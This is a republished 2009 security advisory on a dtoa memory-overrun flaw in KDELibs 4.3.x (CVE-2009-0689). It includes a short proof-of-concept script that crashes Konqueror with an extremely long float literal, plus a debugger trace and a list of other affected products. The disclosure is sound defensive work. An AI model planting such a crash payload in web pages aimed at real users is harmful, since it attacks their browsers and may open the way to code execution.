|
|
|
|
| |
Credit:
The information has been provided by Maksymilian Arciemowicz and sp3x.
The original article can be found at: http://securityreason.com/achievement_securityalert/74
|
| |
Vulnerable Systems:
* KDELibs version 4.3.3
1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code execution)
---
The main problem exists in dtoa implementation. KDE has a very similar dtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist in dtoa.cpp file
http://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup
and it is the same as SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
But the fix for SREASONRES:20090625 as implimented by openbsd was not good. More information about the fix for openbsd and similar is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In Kmax it is defined as 15. Functions in dtoa don't check the Kmax limit, and it is possible to call 16<= elements of freelist array.
2. Proof of Concept (PoC) ---
- -----------------------
<script>
var a=0.<?php echo str_repeat("9",299999); ?>; </script>
- -----------------------
If we use konqueror to see this PoC, konqueror will crash. For example
- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>; </script>
- -----------------------
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 24845, thread 0x7e6e6800]
0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
0x06db85c3 : mov %esi,(%ecx)
#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0
#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0
#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0
#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0
#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0
#6 0x0908337f in KJS::InterpreterImp::evaluate ()
(gdb) i r
eax 0x0 0
ecx 0x220ff000 571469824
edx 0x0 0
ebx 0x220fbb00 571456256
esp 0xcfbc04e0 0xcfbc04e0
ebp 0xcfbc0518 0xcfbc0518
esi 0xc71c71c7 -954437177
edi 0x0 0
eip 0x21415c3 0x21415c3
esi=0x71c71c7
3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
This list is not yet closed. US-CERT declared that they will inform all vendors about this issue, however, they have not yet done so. Even greater confusion caused new CVE number "CVE-2009-1563". Secunia has informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products like KDE and Chrome and that it is based on "CVE-2009-0689".
After some time the Mozilla Foundation Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with note : "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz in CVE-2009-0689".
This fact ( a new CVE number for Firefox Vulnerability ) and PoC in javascript (from Secunia), forced us to officially notify all other vendors. We published all the individual advisories, to formally show all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this issue in all products.
CVE Information:
CVE-2009-0689
Disclosure Timeline:
Discovered 07.05.2009
Published 20.11.2009
-------------------------------------------------------------------------------------------------------------------------------
This vulnerability and over 10,000 others are identified and reported by AVDS, the most technically sophisticated network vulnerability assessment and management system available.
*
|
|
|
|
|
